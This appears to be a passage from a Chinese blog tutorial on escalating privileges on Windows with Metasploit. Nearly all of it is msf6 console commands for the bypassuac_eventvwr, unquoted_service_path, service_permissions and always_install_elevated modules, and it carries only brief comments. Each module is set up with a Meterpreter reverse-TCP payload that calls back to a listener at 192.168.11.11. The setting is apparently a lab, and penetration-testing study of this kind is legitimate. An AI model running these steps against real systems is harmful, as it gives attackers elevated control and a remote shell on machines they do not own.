Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.11.11 yes The listen address (an interface may be specified) LPORT 6699 yes The listen port
Exploit target:
Id Name -- ---- 0 Windows x86
msf6 exploit(windows/local/bypassuac_eventvwr) > run
这个模块就很玄学了只能勇x86位的攻击载荷和target
二,unquoted_service_path模块
1 2 3 4 5 6 7
msf6 exploit(windows/local/service_permissions) > use exploit/windows/local/unquoted_service_path [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/unquoted_service_path) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/unquoted_service_path) > set lhost 192.168.11.11 lhost => 192.168.11.11 msf6 exploit(windows/local/unquoted_service_path) > run
三,service_permissions模块
1 2 3 4 5 6 7 8 9
msf6 exploit(windows/local/always_install_elevated) > use exploit/windows/local/service_permissions [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/service_permissions) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/service_permissions) > set lhost 192.168.11.11 lhost => 192.168.11.11 msf6 exploit(windows/local/service_permissions) > set session 3 session => 3 msf6 exploit(windows/local/service_permissions) > run
未能找出薄弱服务
四,always_install_elevated模块
1 2 3 4 5 6 7 8 9
msf6 exploit(windows/local/bypassuac_injection) > use exploit/windows/local/always_install_elevated [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/always_install_elevated) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/always_install_elevated) > set lhost 192.168.11.11 lhost => 192.168.11.11 msf6 exploit(windows/local/always_install_elevated) > set session 3 session => 3 msf6 exploit(windows/local/always_install_elevated) > run
评论